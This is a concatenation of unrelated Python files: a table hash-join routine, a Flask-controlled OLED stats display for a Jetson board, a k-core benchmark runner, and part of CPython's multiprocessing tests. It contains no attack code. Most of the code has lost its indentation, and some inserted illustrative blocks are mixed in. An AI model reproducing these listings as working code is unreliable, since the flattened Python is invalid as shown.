index2 = recup_index_col(tab2, indexlig2, key)
for i in range(len(index)):
for j in range(len(index2)):
temp = []
# temp.append(key)
for k in range(tab1.n_cols):
temp.append(tab1.data[k][index[i]])
for k2 in range(tab2.n_cols):
if (k2 != indexlig2):
temp.append(tab2.data[k2][index2[j]])
tab.append(temp)
joint = Table(test_scheme, len(tab), tab1.name + " " + tab2.name, tab1.storage)
joint.fill_data(tab)
return joint
def hash_join(tab1, key1, tab2, key2):
test_scheme = {**tab1.schema, **tab2.schema}
del test_scheme[key2]
tab = []
temp = []
indexlig2 = recup_index_lig(tab2, key2)
dico = {}
if (tab1.storage == 'row'):
for i,val in enumerate (tab1.data[:,:]): # build the dict keyed by the row index, which is the same as key1
dico[i]=val
for i in range (len(tab2.data[:,indexlig2])): # scan the second table
if tab2.data[i,indexlig2] in dico : # if the key matches an entry in the dict
temp = list(dico[tab2.data[i,indexlig2]])+list(tab2.data[i,:]) # merge the values of both tables into one row
del temp[tab1.n_cols+indexlig2]
tab.append(temp)
joint = Table(test_scheme, np.array(tab).shape[0], tab1.name + " " + tab2.name, tab1.storage)
joint.fill_data(np.array(tab))
else :
T1 = np.array(tab1.data).T
T2 = np.array(tab2.data).T
for i,val in enumerate (T1):
dico[i]=val
for i in range (len(T2[:,indexlig2])):
if (int(T2[i,indexlig2]) in dico):
temp = list(dico[int(T2[i,indexlig2])])+list(T2[i,:])
del temp[tab1.n_cols+indexlig2]
tab.append(temp)
joint = Table(test_scheme, len(tab), tab1.name + " " + tab2.name, tab1.storage)
joint.fill_data(tab)
"""
else :
T1 = np.array(tab1.data)
T2 = np.array(tab2.data)
for i in range (len(tab1.data[indexlig][:])):
dico[i]= T1[:,i]
for i in range (len(tab2.data[indexlig2][:])):
if (tab2.data[indexlig2][i] in dico):
temp = list(dico[tab2.data[indexlig2][i]])+list(T2[:,i])
del temp[tab1.n_cols+indexlig2]
#temp = np.c_[dico[tab2.data[i,indexlig2]].reshape((a,1)).T,tab2.data[i,:].reshape((b,1)).T]
tab.append(temp)
joint = Table(test_scheme, len(tab), tab1.name + " " + tab2.name, tab1.storage)
joint.fill_data(tab)
"""
return joint
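# --- Added illustration (not part of the original join.py): hash_join above builds a dict over
# --- tab1's rows and probes it while scanning tab2. The same build/probe idea on plain lists of
# --- dicts, independent of the Table class (all names here are ours):
def hash_join_dicts(left_rows, left_key, right_rows, right_key):
    """Inner-join two lists of dicts in roughly O(len(left) + len(right)) expected time."""
    index = {}
    for row in left_rows:  # build phase: hash the left rows on their join key
        index.setdefault(row[left_key], []).append(row)
    joined = []
    for row in right_rows:  # probe phase: look each right row up in the hash table
        for match in index.get(row[right_key], []):
            merged = dict(match)
            merged.update({k: v for k, v in row.items() if k != right_key})
            joined.append(merged)
    return joined

# Example:
# hash_join_dicts([{"id": 1, "name": "a"}], "id", [{"uid": 1, "score": 7}], "uid")
# -> [{"id": 1, "name": "a", "score": 7}]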
|
display_server.py
|
import threading
import Adafruit_SSD1306
import time
import PIL.Image
import PIL.ImageFont
import PIL.ImageDraw
from flask import Flask
from .utils import ip_address, power_mode, power_usage, cpu_usage, gpu_usage, memory_usage, disk_usage
from jetcard import ads1115
from jetcard import ina219
import os
class DisplayServer(object):
def __init__(self, *args, **kwargs):
i2c_bus = 1
adress = os.popen("i2cdetect -y -r 1 0x48 0x48 | egrep '48' | awk '{print $2}'").read()
adress8 = os.popen("i2cdetect -y -r 8 0x48 0x48 | egrep '48' | awk '{print $2}'").read()
if(adress=='48\n'):
self.ads = ads1115.ADS1115()
elif (adress8 =='48\n'):
self.ads = ads1115.ADS1115(i2c_bus=8)
i2c_bus = 8
else:
self.ads = None
adress = os.popen("i2cdetect -y -r 1 0x41 0x41 | egrep '41' | awk '{print $2}'").read()
adress8 = os.popen("i2cdetect -y -r 8 0x41 0x41 | egrep '41' | awk '{print $2}'").read()
if(adress=='41\n'):
self.ina219 = ina219.INA219(addr=0x41)
elif(adress8=='41\n'): # elif, so the else below does not discard a sensor already found on bus 1
self.ina219 = ina219.INA219(addr=0x41, i2c_bus=8)
i2c_bus = 8
else:
self.ina219 = None
adress = os.popen("i2cdetect -y -r 1 0x42 0x42 | egrep '42' | awk '{print $2}'").read()
adress8 = os.popen("i2cdetect -y -r 8 0x42 0x42 | egrep '42' | awk '{print $2}'").read()
if(adress=='42\n'):
self.ina = ina219.INA219(addr=0x42)
elif(adress8=='42\n'): # elif, so the else below does not discard a sensor already found on bus 1
self.ina = ina219.INA219(addr=0x42, i2c_bus=8)
i2c_bus = 8
else:
self.ina = None
print("I2C-BUS:", i2c_bus)
self.display = Adafruit_SSD1306.SSD1306_128_32(rst=None, i2c_bus=i2c_bus, gpio=1)
self.display.begin()
self.display.clear()
self.display.display()
self.font = PIL.ImageFont.load_default()
self.image = PIL.Image.new('1', (self.display.width, self.display.height))
self.draw = PIL.ImageDraw.Draw(self.image)
self.draw.rectangle((0, 0, self.image.width, self.image.height), outline=0, fill=0)
self.stats_enabled = False
self.stats_thread = None
self.stats_interval = 1.0
self.enable_stats()
def _run_display_stats(self):
Charge = False
while self.stats_enabled:
self.draw.rectangle((0, 0, self.image.width, self.image.height), outline=0, fill=0)
# set IP address
top = -2
if ip_address('eth0') is not None:
self.draw.text((4, top), 'IP: ' + str(ip_address('eth0')), font=self.font, fill=255)
elif ip_address('wlan0') is not None:
self.draw.text((4, top), 'IP: ' + str(ip_address('wlan0')), font=self.font, fill=255)
else:
self.draw.text((4, top), 'IP: not available')
top = 6
power_mode_str = power_mode()
if(self.ina != None):
bus_voltage = self.ina.getBusVoltage_V() # voltage on V- (load side)
current = self.ina.getCurrent_mA() # current in mA
p = (bus_voltage - 6)/2.4*100
if(p > 100):p = 100
if(p < 0):p = 0
if(current < 0):current = 0
if(current > 30):
Charge = not Charge
else:
Charge = False
if(Charge == False):
self.draw.text((600, -2), ' ', font=self.font, fill=255)
else:
self.draw.text((120, -2), '*', font=self.font, fill=255)
self.draw.text((4, top), power_mode_str + (" %.1fV")%bus_voltage + (" %.2fA")%(current/1000) + (" %2.0f%%")%p, font=self.font, fill=255)
elif(self.ina219 != None):
bus_voltage = self.ina219.getBusVoltage_V() # voltage on V- (load side)
current = self.ina219.getCurrent_mA() # current in mA
p = (bus_voltage - 9)/3.6*100
if(p > 100):p = 100
if(p < 0):p = 0
if(current < 0):current = 0
if(current > 30):
Charge = not Charge
else:
Charge = False
if(Charge == False):
self.draw.text((600, -2), ' ', font=self.font, fill=255)
else:
self.draw.text((120, -2), '*', font=self.font, fill=255)
self.draw.text((4, top), power_mode_str + (" %.1fV")%bus_voltage + (" %.2fA")%(current/1000) + (" %2.0f%%")%p, font=self.font, fill=255)
elif(self.ads != None):
value=self.ads.readVoltage(4)/1000.0
p = (value - 9)/3.6*100
if(p > 100):p = 100
if(p < 0):p = 0
self.draw.text((4, top), 'MODE: ' + power_mode_str + (" %.1fV")%value + (" %2.0f%%")%p, font=self.font, fill=255)
else:
self.draw.text((4, top), 'MODE: ' + power_mode_str, font=self.font, fill=255)
# set stats headers
top = 14
offset = 3 * 8
headers = ['PWR', 'CPU', 'GPU', 'RAM', 'DSK']
for i, header in enumerate(headers):
self.draw.text((i * offset + 4, top), header, font=self.font, fill=255)
# set stats fields
top = 22
power_watts = '%.1f' % power_usage()
gpu_percent = '%02d%%' % int(round(gpu_usage() * 100.0, 1))
cpu_percent = '%02d%%' % int(round(cpu_usage() * 100.0, 1))
ram_percent = '%02d%%' % int(round(memory_usage() * 100.0, 1))
disk_percent = '%02d%%' % int(round(disk_usage() * 100.0, 1))
entries = [power_watts, cpu_percent, gpu_percent, ram_percent, disk_percent]
for i, entry in enumerate(entries):
self.draw.text((i * offset + 4, top), entry, font=self.font, fill=255)
self.display.image(self.image)
self.display.display()
time.sleep(self.stats_interval)
def enable_stats(self):
# start stats display thread
if not self.stats_enabled:
self.stats_enabled = True
self.stats_thread = threading.Thread(target=self._run_display_stats)
self.stats_thread.start()
def disable_stats(self):
self.stats_enabled = False
if self.stats_thread is not None:
self.stats_thread.join()
self.draw.rectangle((0, 0, self.image.width, self.image.height), outline=0, fill=0)
self.display.image(self.image)
self.display.display()
def set_text(self, text):
self.disable_stats()
self.draw.rectangle((0, 0, self.image.width, self.image.height), outline=0, fill=0)
print(text)
lines = text.split('\n')
top = 2
for line in lines:
self.draw.text((4, top), line, font=self.font, fill=255)
top += 10
self.display.image(self.image)
self.display.display()
server = DisplayServer()
app = Flask(__name__)
@app.route('/stats/on')
def enable_stats():
global server
server.enable_stats()
return "stats enabled"
@app.route('/stats/off')
def disable_stats():
global server
server.disable_stats()
return "stats disabled"
@app.route('/text/<text>')
def set_text(text):
global server
server.set_text(text)
return 'set text: \n\n%s' % text
if __name__ == '__main__':
app.run(host='0.0.0.0', port='8000', debug=False)
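# --- Added usage sketch (not part of the original display_server.py): a minimal client for the
# --- Flask routes above, using only the standard library. The host/IP in the example is
# --- illustrative.
from urllib.parse import quote
from urllib.request import urlopen

def set_display_text(host, text, port=8000):
    """Ask a running DisplayServer to show `text` instead of the stats screen."""
    url = "http://%s:%d/text/%s" % (host, port, quote(text))
    with urlopen(url) as resp:
        return resp.read().decode()

# Example: set_display_text("192.168.55.1", "hello")
# The other routes work the same way: /stats/on resumes the stats thread, /stats/off stops it.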
|
run_k_core.py
|
import socket
from exec_utilities import time_out_util
from config import *
from exec_utilities.exec_utils import *
from multiprocessing import Process
def run_exp(env_tag=knl_tag, with_c_group=True, data_path_tag=k_truss_exec_path_tag):
hostname = socket.gethostname()
with open('config.json') as ifs:
my_config_dict = json.load(ifs)[env_tag]
our_exec_path = my_config_dict[data_path_tag]
data_set_path = my_config_dict[data_set_path_tag]
thread_num_lst = [40]
data_set_lst = my_config_dict[data_set_lst_tag]
exp_res_root_name = 'exp_results'
folder_name = 'exp-2019-12-13-pkc' + os.sep + hostname
our_exec_name_lst = ['test_pkc_imporved', 'test_pkc_legacy']
work_dir = os.sep.join(['.', exp_res_root_name, folder_name])
os.system('mkdir -p ' + work_dir)
logger = get_logger(os.sep.join([work_dir, hostname + '.log']), name=__name__)
logger.info(my_splitter + time.ctime() + my_splitter)
logger.info('res folder: {}'.format(folder_name))
logger.info('our exec folder: {}'.format(our_exec_path))
logger.info('our exec name list: {}'.format(our_exec_name_lst))
logger.info('thread# lst: {}'.format(thread_num_lst))
logger.info('data set lst: {}'.format(data_set_lst))
def one_round():
for data_set_name in data_set_lst:
for our_algorithm in our_exec_name_lst:
for t_num in thread_num_lst:
statistics_dir = os.sep.join(map(str, ['.', exp_res_root_name, folder_name, data_set_name, t_num]))
os.system('mkdir -p ' + os.sep.join([statistics_dir, 'log']))
statistics_file_path = statistics_dir + os.sep + our_algorithm + '.log'
dstat_file_path = statistics_dir + os.sep + our_algorithm + '-dstat.log'
log_file_path = os.sep.join(
[statistics_dir, 'log', '-'.join([our_algorithm, 'raw.log'])])
logger.info('stat file path: {}'.format(statistics_file_path))
logger.info('log file path: {}'.format(log_file_path))
# 1st: append headers
append_header(statistics_file_path)
append_header(dstat_file_path)
append_header(log_file_path)
# 2nd: run exec cmd
algorithm_path = our_exec_path + os.sep + our_algorithm
params_lst = map(str, ['cgexec -g memory:yche-exp' if with_c_group else '', algorithm_path,
data_set_path + os.sep + data_set_name, statistics_file_path])
cmd = ' '.join(params_lst)
logger.info('exec-cmd: {}'.format(cmd))
time_out = 3600 * 5
my_env = os.environ.copy()
def execute_cmd(my_cmd):
logger.info('sub-process: {}'.format(my_cmd))
os.system(my_cmd)
# 3rd: spawn a new process to run the exec
dstat_cmd = 'dstat -tcdrlmgyn --fs >> ' + dstat_file_path
p = Process(target=execute_cmd, args=(dstat_cmd,))
p.start()
my_env['OMP_NUM_THREADS'] = str(t_num)
tle_flag, info, correct_info = time_out_util.run_with_timeout(cmd, timeout_sec=time_out,
env=my_env)
time_out_util.kill_term_recursive(p.pid)
modify_dstat_file(dstat_file_path)
# 4th: append outputs
write_split(statistics_file_path)
with open(statistics_file_path, 'a+') as ifs:
ifs.write(correct_info)
ifs.write('\nis_time_out:' + str(tle_flag))
ifs.write(my_splitter + time.ctime() + my_splitter)
ifs.write('\n\n\n\n')
if len(info) > 0:
with open(log_file_path, 'a+') as ofs:
ofs.write(info)
logger.info('finish: {}'.format(cmd))
one_round()
if __name__ == '__main__':
hostname = socket.gethostname()
if hostname.startswith('ustgpu2'):
run_exp(env_tag=ustgpu2_tag, with_c_group=False)
elif hostname.startswith('ustgpu1'):
run_exp(env_tag=ustgpu1_tag, with_c_group=False)
elif hostname.startswith('lccpu12'):
run_exp(lccpu12_tag, False)
elif hostname.startswith('gpu23'):
run_exp(env_tag=gpu23_tag)
elif hostname.startswith('gpu'):
run_exp(env_tag=gpu_other_tag)
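# --- Added illustration (not part of the original run_k_core.py): the loop above copies the
# --- environment, sets OMP_NUM_THREADS, and runs each benchmark under a wall-clock limit via
# --- time_out_util. A standard-library-only sketch of that pattern; the function name and
# --- return shape are ours, not the helpers used above.
import os
import subprocess

def run_with_thread_limit(cmd, threads, timeout_sec):
    """Run a shell command with a fixed OpenMP thread count and a timeout."""
    env = os.environ.copy()
    env['OMP_NUM_THREADS'] = str(threads)
    try:
        out = subprocess.run(cmd, shell=True, env=env, timeout=timeout_sec,
                             capture_output=True, text=True)
        return False, out.stdout
    except subprocess.TimeoutExpired:
        return True, ''  # timed out, mirroring the tle_flag idea above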
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import contextlib
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 30.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API as threading.Thread
# (join() and is_alive()), the support function can be reused.
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
